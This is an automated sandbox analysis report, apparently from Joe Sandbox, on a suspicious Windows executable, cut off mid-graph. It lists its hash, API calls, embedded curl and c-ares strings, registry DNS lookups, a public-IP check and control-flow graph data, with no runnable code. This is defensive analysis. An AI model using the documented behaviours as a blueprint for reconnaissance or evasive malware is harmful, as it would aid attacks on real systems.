Timestamp: 2024-12-27 13:53:19 UTC; Bytes transferred: 31; Direction: IN; Data:
Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                            Data Ascii: { "origin": "8.46.123.189"}



Target ID: 0
Start time: 08:53:13
Start date: 27/12/2024
Path: C:\Users\user\Desktop\BkB1ur7aFW.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\BkB1ur7aFW.exe"
Imagebase: 0x3f0000
File size: 4'426'752 bytes
MD5 hash: 5FAD6C65B553CA73463694390E2F9301
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 5.2%
Dynamic/Decrypted Code Coverage: 46.8%
Signature Coverage: 8.6%
Total number of Nodes: 545
Total number of Limit Nodes: 52

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSystemInfo.KERNELBASE ref: 003F2579
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 003F25CC
                                                              • GetDriveTypeA.KERNELBASE ref: 003F2647
                                                              • GetDiskFreeSpaceExA.KERNELBASE ref: 003F267E
                                                              • KiUserCallbackDispatcher.NTDLL ref: 003F27E2
                                                              • FindFirstFileW.KERNELBASE ref: 003F28F8
                                                              • FindNextFileW.KERNELBASE ref: 003F291F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                              • String ID: ;%?$@$`
                                                              • API String ID: 3271271169-2834044027
                                                              • Opcode ID: 2f611a7836701ba3adab9df5bf9a4ab45598340f5aeb6f60f67b38c1ba231e6a
                                                              • Instruction ID: b00315104fbff818d2f57cfcff91b449c8192f5c4a17444339d56aea33dd5e3a
                                                              • Opcode Fuzzy Hash: 2f611a7836701ba3adab9df5bf9a4ab45598340f5aeb6f60f67b38c1ba231e6a
                                                              • Instruction Fuzzy Hash: 48D1C3B49093189FCB50EFA8C59569EBBF0FF84340F018969E898D7315E7749A84CF92

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                              • String ID: 0
                                                              • API String ID: 2406880114-4108050209
                                                              • Opcode ID: 5cf6841dfaa497d4b11c1610d5abe77903bfb9f1ba781d11b55639d33bd773aa
                                                              • Instruction ID: 8497c437cdad18f05cefaa66dd42549399d2acae0f28a668c99732887d324d88
                                                              • Opcode Fuzzy Hash: 5cf6841dfaa497d4b11c1610d5abe77903bfb9f1ba781d11b55639d33bd773aa
                                                              • Instruction Fuzzy Hash: 73E1E5B4908309DFCB50EF68D995A9EBBF4AF48344F118869E898DB350E774D944CF42

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph: first block 4005b0-4005b7 (node and edge listing omitted); API calls shown in the graph: WSAEventSelect, WSAEnumNetworkEvents
                                                              APIs
                                                              • WSAEventSelect.WS2_32(?,?,?), ref: 00400711
                                                              • WSAEventSelect.WS2_32(?,?,00000000), ref: 004009DC
                                                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004009FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: EventSelect$EnumEventsNetwork
                                                              • String ID: N=?$multi.c
                                                              • API String ID: 2170980988-1873493139
                                                              • Opcode ID: 472e12622852dc0383a348890efbfb13c205e2bd9e4688a0723b4e9962c1aadb
                                                              • Instruction ID: 41602487361ef7d2c1578efdbf4f0f2b4a0ce777a242fc83ed3ad8db1e1d0dbb
                                                              • Opcode Fuzzy Hash: 472e12622852dc0383a348890efbfb13c205e2bd9e4688a0723b4e9962c1aadb
                                                              • Instruction Fuzzy Hash: EBD1CF716083019FE711DF64C881B6BB7E5BF94348F04483EF985A7282E778E945CB56

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph: first block 3f7770-3f778e (node and edge listing omitted); API calls shown in the graph: recv
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                              • API String ID: 1507349165-640788491
                                                              • Opcode ID: b6be15e46d3c8c92ceb3168669c0d6417f45ad9e0ddf1b2d0843fb258fac5eff
                                                              • Instruction ID: 24b40fa7c9d9ff654475c546f3535e2712e2370b59fd4d8195b725150409ea29
                                                              • Opcode Fuzzy Hash: b6be15e46d3c8c92ceb3168669c0d6417f45ad9e0ddf1b2d0843fb258fac5eff
                                                              • Instruction Fuzzy Hash: AD117DB6A053087BE922A714AC5AE373B6CDBC1B6CF060918F90463382D2219D0482F1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph: first block 4bb180-4bb195 (node and edge listing omitted); API calls shown in the graph: getsockname
                                                              APIs
                                                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 004BB2B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: ares__sortaddrinfo.c$cur != NULL
                                                              • API String ID: 3358416759-2430778319
                                                              • Opcode ID: f1035f602a43a3d8ac795d5ac9ce6370a7d6ffb325173eefb1ccf704df22de19
                                                              • Instruction ID: 3ec42dc51600bb3d1deb0bc67d16491840b9420853bdab1b9c6ab4d87e81051c
                                                              • Opcode Fuzzy Hash: f1035f602a43a3d8ac795d5ac9ce6370a7d6ffb325173eefb1ccf704df22de19
                                                              • Instruction Fuzzy Hash: 4EC181316043059FD718DF25C884AAA77E1FF88344F04886EE8858B3A1D7B8ED45CBE6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a9a5ae7d8d2784793dfd4672150c973173446f5f1fdbf640c7ba1c8d7f604950
                                                              • Instruction ID: f7532c5fd321a978369caf44dc1a1df9dee4274207c00733693df04783148d5f
                                                              • Opcode Fuzzy Hash: a9a5ae7d8d2784793dfd4672150c973173446f5f1fdbf640c7ba1c8d7f604950
                                                              • Instruction Fuzzy Hash: CE913530A0D3494BE7358A2888907BB72D5EFC4364F148B3EE899572D4EB78BC41D697
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 5f4085d7679dcc8779b9d45bf26a22a218198c7068da2cbdb1b89d8f0a06592c
                                                              • Instruction ID: 9edf53a0bbdd75577f8b2d23385b07ea77e46352ae5418c171bcae9bba61fac4
                                                              • Opcode Fuzzy Hash: 5f4085d7679dcc8779b9d45bf26a22a218198c7068da2cbdb1b89d8f0a06592c
                                                              • Instruction Fuzzy Hash: 0231B6B49093149BCB10EFB8D5896AEBBF0FF44344F018869E898E7255E774DA44CF52
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 004AAA19
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 004AAA4C
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 004AAA97
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 004AAAE9
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 004AAB30
                                                              • RegCloseKey.KERNELBASE(?), ref: 004AAB6A
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 004AAB82
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 004AAC46
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 004AAD0A
                                                              • RegEnumKeyExA.KERNELBASE ref: 004AAD8D
                                                              • RegCloseKey.KERNELBASE(?), ref: 004AADD9
                                                              • RegEnumKeyExA.KERNELBASE ref: 004AAE08
                                                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 004AAE2A
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 004AAE54
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 004AAF63
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 004AAFB2
                                                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 004AB072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Open$CloseEnum
                                                              • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                              • API String ID: 4217438148-1047472027
                                                              • Opcode ID: 1fa57141601df77e05271057dfe48d5cae018589270b1bfa8610a7a0f309a083
                                                              • Instruction ID: 582717d6119b175fd941b12071fafa31e9a627f5e0b53a0d3844ab42af46561b
                                                              • Opcode Fuzzy Hash: 1fa57141601df77e05271057dfe48d5cae018589270b1bfa8610a7a0f309a083
                                                              • Instruction Fuzzy Hash: 0772F1B1608301AFE710DB24CC85B6BB7E8EF96700F14492DF985972A2E779E814CB57
                                                              APIs
                                                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0042A832
                                                              Strings
                                                              • @, xrefs: 0042A8F4
                                                              • Local Interface %s is ip %s using address family %i, xrefs: 0042AE60
                                                              • Trying [%s]:%d..., xrefs: 0042A689
                                                              • @, xrefs: 0042AC42
                                                              • bind failed with errno %d: %s, xrefs: 0042B080
                                                              • Bind to local port %d failed, trying next, xrefs: 0042AFE5
                                                              • Could not set TCP_NODELAY: %s, xrefs: 0042A871
                                                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0042AD0A
                                                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 0042ADAC
                                                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 0042AE1F
                                                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0042A6CE
                                                              • cf-socket.c, xrefs: 0042A5CD, 0042A735
                                                              • cf_socket_open() -> %d, fd=%d, xrefs: 0042A796
                                                              • Trying %s:%d..., xrefs: 0042A7C2, 0042A7DE
                                                              • Local port: %hu, xrefs: 0042AF28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: setsockopt
                                                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3981526788-2373386790
                                                              • Opcode ID: 2b723bbb42e4c16012b8569c111b39e6ae8a900587b0ffc9a263baa562dd8b0c
                                                              • Instruction ID: 6066b3860d41c3852084492d52d98422df844e83209eb9fa98d63275a2272a8c
                                                              • Opcode Fuzzy Hash: 2b723bbb42e4c16012b8569c111b39e6ae8a900587b0ffc9a263baa562dd8b0c
                                                              • Instruction Fuzzy Hash: 58620471604340ABE720CF14E845BABB7E4BF84308F44492EFD8897292E779E955CB97

                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 004B9946
                                                              • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 004B9974
                                                              • RegCloseKey.KERNELBASE(?), ref: 004B998B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                              • API String ID: 3677997916-615551945
                                                              • Opcode ID: 5900d5c894c47e7cbe8e13a504b5f80ce26ac05a07f6586f03b551eaeb9348cf
                                                              • Instruction ID: 70d785e7f9f53e6693fee749489267baec072a35c993da2ed459f8d8da26a19f
                                                              • Opcode Fuzzy Hash: 5900d5c894c47e7cbe8e13a504b5f80ce26ac05a07f6586f03b551eaeb9348cf
                                                              • Instruction Fuzzy Hash: FA32EAF19042019BEB11AB22EC42A9776E8AF55318F08443AFD0996363F739ED15C77B

                                                              APIs
                                                              • connect.WS2_32(?,?,00000001), ref: 00428C30
                                                              • SleepEx.KERNELBASE(00000000,00000000), ref: 00428CF3
                                                              • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00428D0F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: Sleepconnectgetsockopt
                                                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                              • API String ID: 1669343778-879669977
                                                              • Opcode ID: e90a721ae1d63c712b5c2a94237753cbd0450d00cf6e06b62034ef93ab113cfa
                                                              • Instruction ID: bc5fecae52d7d0d99890e9a6785be97cb99a369e1bdee412bcfcd41babd9e4e8
                                                              • Opcode Fuzzy Hash: e90a721ae1d63c712b5c2a94237753cbd0450d00cf6e06b62034ef93ab113cfa
                                                              • Instruction Fuzzy Hash: D4B1BE70705315AFE710CF24E885BAB7BE0AF44318F44852EF8599A3D2DB78E858C766

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: EnumOpen
                                                              • String ID: d
                                                              • API String ID: 3231578192-2564639436
                                                              • Opcode ID: fcca9ce95e385c69c3316ddee36e5351c5b6717d62fc0a82456f0da87c336717
                                                              • Instruction ID: 5447549420f0d02fc76a3fab0c703bf6adb2d0c390f8e8126c4b6f9221fc60c8
                                                              • Opcode Fuzzy Hash: fcca9ce95e385c69c3316ddee36e5351c5b6717d62fc0a82456f0da87c336717
                                                              • Instruction Fuzzy Hash: 0D71B4B49043199FDB50DF69D584B9EBBF0FF84308F108869E99897311D7749A88CF92

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1179 3f76a0-3f76be 1180 3f76e6-3f76f2 send 1179->1180 1181 3f76c0-3f76c7 1179->1181 1183 3f775e-3f7762 1180->1183 1184 3f76f4-3f7709 call 3f72a0 1180->1184 1181->1180 1182 3f76c9-3f76d1 1181->1182 1186 3f770b-3f7759 call 3f72a0 call 3fcb20 call 778c50 1182->1186 1187 3f76d3-3f76e4 1182->1187 1184->1183 1186->1183 1187->1184
                                                              APIs
                                                              • send.WS2_32(multi.c,?,?,?,N=?,00000000,?,?,004007BF), ref: 003F76EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID: LIMIT %s:%d %s reached memlimit$N=?$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                              • API String ID: 2809346765-1089250579
                                                              • Opcode ID: c466979bc649a6f4044851038b13e2a972d64ac5b83ccd003c5e634b9a1a5f54
                                                              • Instruction ID: bda34d31f5aeb585e612170368cb6d0edf5b1485fffed9f1447d49f15a83bd95
                                                              • Opcode Fuzzy Hash: c466979bc649a6f4044851038b13e2a972d64ac5b83ccd003c5e634b9a1a5f54
                                                              • Instruction Fuzzy Hash: 7211C4B271930C7BE512A754AC56D373F5CDBC2B5CF060914FD0467382E2619D0082F1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1298 429290-4292ed call 3f76a0 1301 4293c3-4293ce 1298->1301 1302 4292f3-4292fb 1298->1302 1309 4293d0-4293e1 1301->1309 1310 4293e5-429427 call 40d090 call 434f40 1301->1310 1303 429301-429333 call 40d8c0 call 40d9a0 1302->1303 1304 4293aa-4293af 1302->1304 1322 4293a7 1303->1322 1323 429335-429364 WSAIoctl 1303->1323 1307 429456-429470 1304->1307 1308 4293b5-4293bc 1304->1308 1312 429429-429431 1308->1312 1313 4293be 1308->1313 1309->1308 1314 4293e3 1309->1314 1310->1307 1310->1312 1317 429433-429437 1312->1317 1318 429439-42943f 1312->1318 1313->1307 1314->1307 1317->1307 1317->1318 1318->1307 1321 429441-429453 call 4350a0 1318->1321 1321->1307 1322->1304 1326 429366-42936f 1323->1326 1327 42939b-4293a4 1323->1327 1326->1327 1330 429371-429390 setsockopt 1326->1330 1327->1322 1330->1327 1331 429392-429395 1330->1331 1331->1327
                                                              APIs
                                                              • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0042935D
                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00429388
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: Ioctlsetsockopt
                                                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                              • API String ID: 1903391676-2691795271
                                                              • Opcode ID: 1de0ecebb0dcc7df438680221b0a89bdde237d5277e27c868b26ed0d0cba11fd
                                                              • Instruction ID: 01999b87ddff0c85c28390e542ceeae45aaef0a85d1a11e52efd5a74d26a4c15
                                                              • Opcode Fuzzy Hash: 1de0ecebb0dcc7df438680221b0a89bdde237d5277e27c868b26ed0d0cba11fd
                                                              • Instruction Fuzzy Hash: E651BE71B04305ABE710DF24C881BAAB7A5EF88318F54852EFD489B382E735AD51CB95

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1351 3f75e0-3f75ed 1352 3f75ef-3f75f6 1351->1352 1353 3f7607-3f7629 socket 1351->1353 1352->1353 1354 3f75f8-3f75ff 1352->1354 1355 3f763f-3f7642 1353->1355 1356 3f762b-3f763c call 3f72a0 1353->1356 1357 3f7643-3f7699 call 3f72a0 call 3fcb20 call 778c50 1354->1357 1358 3f7601-3f7602 1354->1358 1356->1355 1358->1353
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                              • API String ID: 98920635-842387772
                                                              • Opcode ID: cfcc7422523bcb405398ad5cad1513789d366ca2f8bfc4438234efa795d1dede
                                                              • Instruction ID: d351c9ca23c506024698685904a00e902a023b7209fe481c016eb26b33b4ea7e
                                                              • Opcode Fuzzy Hash: cfcc7422523bcb405398ad5cad1513789d366ca2f8bfc4438234efa795d1dede
                                                              • Instruction Fuzzy Hash: 3B114C77B1121537EE125B68BC26FAB3F98DFC1768F060924F514A62E2D3118D5092E1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1564 42a150-42a159 1565 42a250 1564->1565 1566 42a15f-42a17b 1564->1566 1567 42a181-42a1ce getsockname 1566->1567 1568 42a249-42a24f 1566->1568 1569 42a1d0-42a1f5 call 40d090 1567->1569 1570 42a1f7-42a214 call 42ef30 1567->1570 1568->1565 1578 42a240-42a246 call 434f40 1569->1578 1570->1568 1574 42a216-42a23b call 40d090 1570->1574 1574->1578 1578->1568
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 0042A1C7
                                                              Strings
                                                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0042A23B
                                                              • getsockname() failed with errno %d: %s, xrefs: 0042A1F0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3358416759-2605427207
                                                              • Opcode ID: a1d73a023aa272c377887856e78ebb6cd94e3f42d6265ffc25ebb2699c6e346b
                                                              • Instruction ID: 27d3ceca67768e07631d81bb20777c787cc694bd1ffb2b39148071d5810c8d1f
                                                              • Opcode Fuzzy Hash: a1d73a023aa272c377887856e78ebb6cd94e3f42d6265ffc25ebb2699c6e346b
                                                              • Instruction Fuzzy Hash: 08212B31908280B7F6259719EC42FE7B3ACEF81328F040655FD8853151FA36698586E6

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1584 40d5e0-40d5ee 1585 40d5f0-40d604 call 40d690 1584->1585 1586 40d652-40d662 WSAStartup 1584->1586 1592 40d606-40d614 1585->1592 1593 40d61b-40d651 call 417620 1585->1593 1587 40d670-40d676 1586->1587 1588 40d664-40d66f 1586->1588 1587->1585 1590 40d67c-40d68d 1587->1590 1592->1593 1598 40d616 1592->1598 1598->1593
                                                              APIs
                                                              • WSAStartup.WS2_32(00000202), ref: 0040D65B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: Startup
                                                              • String ID: if_nametoindex$iphlpapi.dll
                                                              • API String ID: 724789610-3097795196
                                                              • Opcode ID: d6e4b93891e9e78f65c0fe02427b4560a1fd47015fbee24c8659d99698fc880f
                                                              • Instruction ID: 7f05ff0a403673e0d1e083eb1141a935bec67f4bcaf1ca50f6df0f14bfa1c879
                                                              • Opcode Fuzzy Hash: d6e4b93891e9e78f65c0fe02427b4560a1fd47015fbee24c8659d99698fc880f
                                                              • Instruction Fuzzy Hash: 830176D2E4434196FB00BBB8AC1776321A06B92308F490C79DC88A12D3F73EC68DC293

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1600 4baa30-4baa64 1602 4baa6a-4baaa7 call 4ae730 1600->1602 1603 4bab04-4bab09 1600->1603 1607 4baaa9-4baabd 1602->1607 1608 4bab0e-4bab13 1602->1608 1604 4bae80-4bae89 1603->1604 1610 4bab18-4bab50 1607->1610 1611 4baabf-4baac7 1607->1611 1609 4bae2e 1608->1609 1612 4bae30-4bae4a call 4aea60 call 4aebf0 1609->1612 1616 4bab58-4bab6d 1610->1616 1611->1609 1613 4baacd-4bab02 1611->1613 1625 4bae4c-4bae57 1612->1625 1626 4bae75-4bae7d 1612->1626 1613->1616 1619 4bab6f-4bab73 1616->1619 1620 4bab96-4babab socket 1616->1620 1619->1620 1622 4bab75-4bab8f 1619->1622 1620->1609 1624 4babb1-4babc5 1620->1624 1622->1624 1638 4bab91 1622->1638 1627 4babd0-4babed ioctlsocket 1624->1627 1628 4babc7-4babca 1624->1628 1630 4bae59-4bae5e 1625->1630 1631 4bae6e-4bae6f 1625->1631 1626->1604 1633 4babef-4bac0a 1627->1633 1634 4bac10-4bac14 1627->1634 1628->1627 1632 4bad2e-4bad39 1628->1632 1630->1631 1641 4bae60-4bae6c 1630->1641 1631->1626 1639 4bad3b-4bad4c 1632->1639 1640 4bad52-4bad56 1632->1640 1633->1634 1645 4bae29 1633->1645 1635 4bac37-4bac41 1634->1635 1636 4bac16-4bac31 1634->1636 1643 4bac7a-4bac7e 1635->1643 1644 4bac43-4bac46 1635->1644 1636->1635 1636->1645 1638->1609 1639->1640 1639->1645 1640->1645 1646 4bad5c-4bad6b 1640->1646 1641->1626 1650 4bac80-4bac9b 1643->1650 1651 4bace7-4bad03 1643->1651 1648 4bac4c-4bac51 1644->1648 1649 4bad04-4bad08 1644->1649 1645->1609 1653 4bad70-4bad78 1646->1653 1648->1649 1658 4bac57-4bac78 1648->1658 1649->1632 1657 4bad0a-4bad28 1649->1657 1650->1651 1659 4bac9d-4bacc1 1650->1659 1651->1649 1655 